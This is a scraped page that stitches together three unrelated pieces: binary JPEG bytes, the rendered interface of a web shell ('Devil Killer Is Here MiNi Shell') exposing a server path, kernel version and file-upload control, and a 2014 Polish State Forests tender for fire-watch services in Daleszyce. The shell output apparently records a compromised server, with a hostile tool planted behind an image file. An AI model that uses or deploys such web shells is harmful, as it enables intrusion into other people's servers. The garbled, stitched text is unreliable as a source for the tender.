JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140211/26743-N-2014.html

<p class="kh_header"><b>Daleszyce: Pełnienie dyżuru przeciwpożarowego w punkcie alarmowo - dyspozycyjnym, w dostrzegalni p.poż. (wieża obserwacyjna) oraz jako kierowca - operator samochodu patrolowo - gaśniczego  w Nadleśnictwie Daleszyce</b><br>
<b>Numer ogłoszenia: 26743 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe - Nadleśnictwo Daleszyce , ul. Zakościele 7A, 26-021 Daleszyce, woj. świętokrzyskie, tel. 41 3171968, faks 41 317 12 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radom.lasy.gov.pl/web/daleszyce</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie dyżuru przeciwpożarowego w punkcie alarmowo - dyspozycyjnym, w dostrzegalni p.poż. (wieża obserwacyjna) oraz jako kierowca - operator samochodu patrolowo - gaśniczego  w Nadleśnictwie Daleszyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest Pełnienie dyżuru przeciwpożarowego w punkcie alarmowo - dyspozycyjnym, w dostrzegalni p.poż. (wieża obserwacyjna) oraz jako kierowca - operator samochodu patrolowo - gaśniczego  w Nadleśnictwie Daleszyce
3.2.	 Zakres czynności kierowcy - operatora samochodu patrolowo - gaśniczego  obejmuje:
1.	Na polecenie i zgodnie ze wskazówkami otrzymywanymi z PAD Nadleśnictwa wykonuje jazdy patrolowe w zasięgu terytorialnym Nadleśnictwa w celu lokalizacji potencjalnych pożarów. Na polecenie PAD wyjazdy do pożarów uprzednio zlokalizowanych w zasięgu terytorialnym Nadleśnictwa. Zamawiający przyjął iż średnio - miesięczna ilość przejeżdżanych kilometrów w celu realizowania przedmiotu zamówienia nie przekroczy 700 km. 
2.	Po zlokalizowaniu pożaru na gruncie Wykonawca określa jego dokładną lokalizację, rodzaj,  wielkość, kierunek przesuwania się ognia. W przypadku pożarów wykrytych poza terenem lasów administrowanych przez Nadleśnictwo Daleszyce należy określić ich odległość od LP i wielkość zagrożenia jakie dla nich stwarzają. Informacje te należy możliwie jak najszybciej przekazać do PAD. W przypadku fałszywego alarmu stwierdzenie tego faktu i przekazanie informacji do PAD może nastąpić po wykonaniu czynności poszukiwawczych w sposób dający maksymalną pewność co do prawdziwości powyższego stwierdzenia. 
3.	Gaszenie zlokalizowanych pożarów lub ich zarzewi z wykorzystaniem sprzętu stanowiącego   wyposażenie samochodu patrolowo-gaśniczego (motopompy oraz sprzętu ręcznego). Priorytetem przy podjęciu decyzji o rozpoczęciu akcji gaśniczej jest w pierwszym rzędzie bezpieczeństwo Wykonawcy a następnie bezpieczeństwo powierzonego sprzętu. 

Podjęcie akcji gaśniczej może nastąpić jedynie po uzyskaniu zgody z PAD Nadleśnictwa (na podstawie opisu sytuacji przekazanego wcześniej przez Wykonawcę), bądź osoby upoważnionej przez Nadleśnictwo do kierowania akcją gaśniczą zgodnie z zapisem w obowiązującym w 2014 roku (wydawanym corocznie) Zarządzeniu Nadleśniczego Nadleśnictwa Daleszyce w sprawie wprowadzenia dyżurów i innych działań ratowniczych związanych z ochroną p.poż. obszarów leśnych (o ile znajduje się ona na miejscu zdarzenia). Zgody takiej może udzielić również Nadleśniczy. W przypadku zniszczenia lub uszkodzenia drobnego sprzętu tj. szpadli, tłumic, siekier użytych w trakcie akcji gaszenia pożaru lub zabezpieczenia pożarzyska koszty związane z uzupełnieniem zniszczonego drobnego sprzętu ponosi Zamawiający, a za pozostałe wyposażenie w pełni odpowiada Wykonawca.
4.	Zabezpieczanie pożarzysk oraz obszarów zagrożonych objęciem przez rozprzestrzeniający się pożar poprzez zraszanie wodą, wykonywanie pasów izolacyjnych z piany lub za pomocą narzędzi ręcznych. Podjęcie w/w działań może nastąpić wyłącznie wg. procedury opisanej w pkt. 3. 
5.	Na polecenie PAD wykonawca zobowiązany jest oznaczyć dojazd do miejsca pożaru tabliczkami kierunkowymi, bądź osobiście doprowadzić na miejsce pożaru jednostki Straży Pożarnej.  
6.	Wykonawca ma obowiązek prowadzenia na bieżąco kontroli wyjazdów oraz godzin pracy modułu gaśniczego na druku przekazanym przez Zamawiającego.
7.	Pełnienie dyżuru odbywać się będzie, w godzinach od 9.00 do 19.00. Czas pełnienia dyżuru może ulec skróceniu bądź wydłużeniu zgodnie z dyspozycją  RPAD bądź decyzją kierownictwa Nadleśnictwa lub osoby przez nie upoważnionej. Dyspozycja dotycząca uruchomienia bądź odwołania oraz czasu trwania dyżuru  każdorazowo przekazywana jest przez PAD Nadleśnictwa - po komunikatach z PAD RDLP około godziny 9 i 13. Miejscem pełnienia dyżuru (w oczekiwaniu na dyspozycję wyjazdu) jest siedziba Nadleśnictwa Daleszyce.
8.	Wszystkie wyjazdy patrolowe i interwencyjne w ramach realizacji przedmiotu zamówienia odbywać się będą w obsadzie dwuosobowej.
9.   Do realizacji zadań wynikających z powyższego zakresu obowiązków WYKONAWCA używał będzie sprzętu stanowiącego własność Zamawiającego według poniższego zestawienia:
1. samochód ciężarowy Nissan Navara - 1 szt., 
2. zabudowana skrzynia ładunkowa żaluzyjna - 1 szt.,  
3. moduł gaśniczy - 1 szt., 
4. trójkąt ostrzegawczy - 1 szt.,
5. apteczka - 1 szt.,
6. gaśnica - 1 szt.,
7. podnośnik - 1 szt.,
8. tłumice do gaszenia pożaru - 4 szt.,
9. radiotelefon samochodowy - 1 szt.,
10. radiotelefon przenośny - 1 szt.,
11. antena do radiotelefonu - 1szt.,
12. telefon komórkowy - 1 szt.,
13. lampa błyskowa ostrzegawcza koloru pomarańczowego z podstawą na magnes - 1szt.,
14. siekiera - 2 szt.,
15. szpadel - 4szt., 
16. wyciągarka elektryczna - 1 szt.,
17. pilarka spalinowa - 1szt.,
18. GPS - 1 szt., 
19. hydronetki plecakowe - 4 szt.,
20. tabliczki kierunkowe - 6 szt.,
oraz wyposażenia stanowiące własność Zamawiającego według poniższego zestawienia:
1.	Hełm ochronny - 2 szt.,
2.	Buty strażaka - 2 pary,
3.	Rękawice - 2 pary,
4.	Kominiarka - 2 szt.,
5.	Kurtka - 2 szt.,
6.	Spodnie - 2 pary.

udostępnionego przez Nadleśnictwo Daleszyce na podstawie odrębnej umowy dzierżawy. Nadleśnictwo wynajmie WYKONAWCY garaż na terenie swojej siedziby, będący miejscem stacjonowania samochodu patrolowo-gaśniczego poza czasem dyżurów. Szacowane miesięczne koszty netto dzierżawy 
i wynajmu sprzętu oraz pomieszczeń wyniosą 3000,00 zł. 
Zapatrzenie w wodę i środki pianotwórcze do celów gaśniczych zapewnia Zamawiający 

3.3. Zakres czynności w punkcie alarmowo - dyspozycyjnym obejmuje:
1.	Prowadzenie nasłuchu radiowego kanałów Lasów Państwowych (regionalnego oraz lokalnego) oraz kanału Miejskiego Stanowiska Kierowania Państwowej Straży Pożarnej (MSK PSP)
2.	 Przyjmowanie i odnotowywanie prognoz (komunikatów o zagrożeniu) z RPAD (Regionalnego Punktu Alarmowo Dyspozycyjnego)na godzinę 9.00 i 13.00, przekazywanie wynikających z nich dyspozycji dotyczących czasu pracy obserwatorowi na wieży oraz w miarę potrzeb pracownikom Nadleśnictwa
3.	Przyjmowanie z RPAD, sąsiednich Nadleśnictw, MSK PSP, samolotów i osób trzecich meldunków o pożarach i innych miejscowych zagrożeniach (drogą radiową i telefoniczną).
4.	Ustalenie lokalizacji pożaru lasu lub innego miejscowego zagrożenia.
5.	Alarmowania sił własnych oraz RSK PSP właściwego terytorialnie dla miejsca pożaru lasu lub miejscowego zagrożenia.
6.	Utrzymywania stałej łączności z miejscem akcji ratowniczej.
7.	Współpracuje z RPAD w zakresie dysponowania samolotami gaśniczymi.
8.	Prowadzenia stałej kontroli pracy własnych sił naziemnych.
9.	Prowadzenia dokładnej ewidencji pożarów i innych miejscowych zagrożeń oraz odnotowywanie informacji związanych z pracą  Punktu Alarmowo-Dyspozycyjnego, zgodnie z obowiązującymi wzorami i zasadami.
10.	Bieżącego informowania Nadleśniczego, RPAD i osób wyznaczonych sytuacji na miejscu pożaru i przebiegu prowadzonej akcji ratowniczej.
11.	Realizowania poleceń wydanych w czasie pełnienia dyżurów przez RPAD, kierownictwo Nadleśnictwa bądź osoby przez nie upoważnione.
12.	Prowadzenie dyżuru w PAD odbywać się będzie, zgodnie z instrukcją prowadzenia dyżuru, w godzinach od 9.00 do 19.00 w dni wolne od pracy 
i święta oraz od 15.00 do 19.00 w dni robocze w siedzibie Nadleśnictwa Daleszyce. 
13.	Czas pełnienia dyżuru może ulec skróceniu bądź wydłużeniu zgodnie z dyspozycją  RPAD bądź decyzją kierownictwa Nadleśnictwa lub osoby przez nie upoważnionej.
14.	Gotowość do pełnienia dyżurów w PAD obowiązuje od 1 marca do 31 października ( 8 miesięcy).
15.	Termin rozpoczęcia i zakończenia dyżurów w PAD wynika z terminu rozpoczęcia i zakończenia akcji p-poż. określonego zarządzeniem wydawanym corocznie przez Dyrektora Regionalnej Dyrekcji  Lasów Państwowych w Radomiu.
16.	Termin rozpoczęcia i zakończenia akcji p-poż. jest okresem realizacji wykonania usługi za który faktycznie Zamawiający zapłaci. W przypadku utrzymania się zagrożenia w miesiącu listopadzie, przewiduje się przedłużenie dyżurów 
w PAD na ww zasadach, aż do odwołania. Możliwe jest również późniejsze rozpoczęcie dyżurów, a także wcześniejsze ich zakończenie.
17.	Prace należy wykonywać w terminach określonych  w protokołach przekazania prac do wykonania, sporządzanych przez pracownika Nadleśnictwa odpowiedzialnego za ochronę przeciwpożarową. 
18.	Realizacja przedmiotu zamówienia będzie przebiegała sukcesywnie, okresem rozliczeniowym będzie okres jednego miesiąca.
19.	Wykonawca nie będzie miał żadnych roszczeń w stosunku do Zamawiającego 
w przypadku zmniejszenia przedmiotu zamówienia.
20.	Nadzór doraźny i stały nad osobami wykonującymi prace pełni Wykonawca. Wykonawca odpowiada za spełnienie wszelkich wymogów z zakresu BHP obowiązujących przy wykonywaniu pracy objętej zleceniem.
21.	Wykonawca ponosi osobiście odpowiedzialność za ewentualne szkody wyrządzone Zamawiającemu oraz osobom trzecim, wskutek niewłaściwego działania Wykonawcy lub zatrudnionych przez niego pracowników 
i podwykonawców.

3.4. Zakres czynności na dostrzegalni obejmuje:
1.	Obserwowanie terenu leśnego będącego w zasięgu widoczności z punktu obserwacyjnego, oraz niezwłoczne meldowanie do PAD w Nadleśnictwie Daleszyce o zauważonych dymie i ogniu wydobywającym się z lasu lub z bezpośredniego sąsiedztwa, oraz innych spostrzeżonych wypadkach.
2.	Meldowanie do PAD w Nadleśnictwie Daleszyce o rozpoczęciu i zakończeniu pracy (na chwilowe zejście  z dostrzegalni może zezwolić tylko dyżurny punktu).
3.	Po dostrzeżeniu wydobywającego się dymu lub ognia z lasu obserwator wyznacza dokładnie kierunek jego miejsca (odczytuje wartość kąta) za  pomocą kierunkomierza, a następnie wzrokowo określa miejsce powstania pożaru, po czym niezwłocznie składa meldunek do PAD. 
4.	Przy nadaniu meldunku należy podać:
dokładny czas zauważenia pożaru 
odczytany z kierunkomierza kąt (kierunek pożaru)
odległość do miejsca pożaru określona wzrokowo (miejsce powstania pożaru)
wielkość zauważonego dymu (małe, średnie, duże kłęby dymu)
kierunek dymu znoszonego podmuchami wiatru 
5.	Wszystkie dane przekazywane do PAD obserwator musi zapisać w swojej książce     obserwatora.
6.	Dalszym obowiązkiem jest ciągłe obserwowanie zauważonego dymu i bieżące zgłaszanie zmian do dyżurnego w PAD, oraz ich zapisywanie.
7.	W przypadku wystąpienia silnych wiatrów lub burz z wyładowaniami  atmosferycznymi, obserwator zgłasza zaistniałe zjawiska do PAD i postępuje wg otrzymanych poleceń.
8.	Obserwator dba o porządek i czystość w swoim miejscu pracy, dotyczy to również bieżącego utrzymywania czystości szyb w oknach kabiny obserwacyjnej
9.	Obserwator ma obowiązek natychmiastowo powiadomić PAD o wszelkich zauważonych uszkodzeniach wieży obserwacyjnej (dotyczy również ogrodzenia wieży i terenu wewnątrz niego) 
10.	Prowadzenie obserwacji terenu i zgłaszanie wszelkich zagrożeń odbywać się będzie, zgodnie z instrukcją prowadzenia dyżuru, w godzinach od 9.00 do 19.00.
11.	Czas pełnienia dyżuru może ulec skróceniu bądź wydłużeniu zgodnie 
z dyspozycją  RPAD bądź decyzją kierownictwa Nadleśnictwa lub osoby przez nie upoważnionej. Dyspozycja dotycząca czasu trwania dyżuru każdorazowo przekazywana jest przez PAD Nadleśnictwa.
12.	Gotowość do obserwacji terenu z dostrzegalni obowiązuje od 1 marca do 31 października 2014 r. ( 8 miesięcy).
13.	Termin rozpoczęcia i zakończenia dyżurów na wieży obserwacyjnej wynika 
z terminu rozpoczęcia i zakończenia akcji  p-poż. określonego zarządzeniem wydawanym corocznie przez Dyrektora Regionalnej Dyrekcji Lasów Państwowych w Radomiu.
14.	Termin rozpoczęcia i zakończenia akcji p-poż. jest okresem realizacji wykonania usługi za który faktycznie zamawiający zapłaci. W przypadku utrzymania się zagrożenia w miesiącu listopadzie, przewiduje się przedłużenie dyżurów na w/w zasadach, aż do odwołania. Możliwe jest również późniejsze rozpoczęcie dyżurów, a także wcześniejsze ich zakończenie.
15.	Prace należy wykonywać w terminach określonych  w protokołach przekazania prac do wykonania, sporządzanych przez pracownika Nadleśnictwa odpowiedzialnego za ochronę przeciwpożarową. Realizacja przedmiotu zamówienia będzie przebiegała sukcesywnie, okresem rozliczeniowym będzie okres jednego miesiąca.
16.	Wykonawca nie będzie miał żadnych roszczeń w stosunku do Zamawiającego 
w przypadku zmniejszenia przedmiotu zamówienia.
17.	Nadzór doraźny i stały nad osobami wykonującymi prace pełni Wykonawca. Wykonawca odpowiada za spełnienie wszelkich wymogów z zakresu BHP obowiązujących przy wykonywaniu pracy objętej zleceniem.
18.	Wykonawca ponosi osobiście odpowiedzialność za ewentualne szkody wyrządzone Zamawiającemu oraz osobom trzecim, wskutek niewłaściwego działania Wykonawcy lub zatrudnionych przez niego pracowników 
i podwykonawców.
3.5. Zamawiający żąda by Wykonawca wskazał w ofercie część zamówienia, której wykonanie chce powierzyć podwykonawcom Jeżeli wykonawca ma zamiar zlecić wykonanie części usług podwykonawcy to musi wypełnić i załączyć do oferty załącznik nr 4 do SIWZ. Brak takiego załącznika traktowany będzie, jako że Wykonawca nie przewiduje udziału Podwykonawców w przedmiocie zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa art. 67 ust. 1 pkt. 6 ustawy  z dnia 29 stycznia 2004 roku Prawo zamówień publicznych w okresie 3 lat od udzielenia zamówienia podstawowego, w wysokości nie przekraczającej 50% wartości zamówienia podstawowego liczonego osobno dla każdej grupy czynności i polegającego na powtórzeniu tego samego rodzaju zamówienia. Podane w ofercie wartości realizacji zamówienia podstawowego będzie podstawą negocjacji warunków zamówienia zgodnie z art. 67 ust. 1 pkt. 6 Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.22.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. W przedmiotowym postępowaniu jest wymagane wadium. 
       Zamawiający wymaga wniesienia wadium w wysokości 1000,00 zł.
8.2 Wadium może być wnoszone  w jednej lub kilku następujących formach:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r, Nr 42, poz. 275).
8.3  Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Bank : BGŻ SA oddz. Kielce 
Nr rachunku : 64 2030 0045 1110 0000 0129 7880  z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej zadania: Pełnienie dyżuru przeciwpożarowego w Nadleśnictwie Daleszyce

8.4  Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, lub poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy w formie oryginału zdeponować w kasie u Zamawiającego od poniedziałku do piątku w godzinach od 08:00 do 13:00.
8.5  Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, lub poręczeniach udzielanych przez podmioty, których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego 
w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
8.6 Wadium musi być wniesione najpóźniej przed upływem terminu składania ofert.
8.7 Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Nie należy załączać oryginału dokumentu złożenia wadium do oferty.
Wadium musi zabezpieczać cały okres związania ofertą Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium 
w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
8.8 Zamawiający zwraca wadium wszystkim wykonawcą niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli wniesienia jego żądano. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony, jeżeli wykonawca wykaże, że w okresie  ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie usługi odpowiadające przedmiotowi zamówienia, która każda trwała nieprzerwalnie min. 5 miesięcy. Wykonawca nie może sumować okresu kilku usług o mniejszym zakresie dla uzyskania wymaganego przez Zamawiającego okresu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.2.2.	W zakresie dysponowania, osobami niezbędnymi do realizacji przedmiotu zamówienia: zamawiający uzna niniejszy warunek za spełniony jeżeli Wykonawca wykaże, że będzie dysponowł minimum 4 osobami, gdzie:
a)	do obsługi samochodu patrolowo-gaśniczego co najmniej dwiema osobami z których przynajmniej jedna posiada prawo jazdy min. kategorii B z aktualnym zaświadczeniem wystawionym przez lekarza medycyny pracy (zaświadczającym o braku przeciwskazań do prowadzenia pojazdów), oraz przynajmniej jedna posiada  uprawnienia do pracy spalinową pilarką łańcuchową. 
b)	do pełnienia dyżuru na wieży p.poż. co najmniej jedną osobą posiadającą ważne badania lekarskie uprawniające do pracy na wysokości - wysokość wieży około 33m;
c)	do pełnienia dyżuru w punkcie alarmowo - dyspozycyjnym co najmniej jedna osoba - z minimum podstawową znajomością obsługi komputera</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, na zasadzie spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

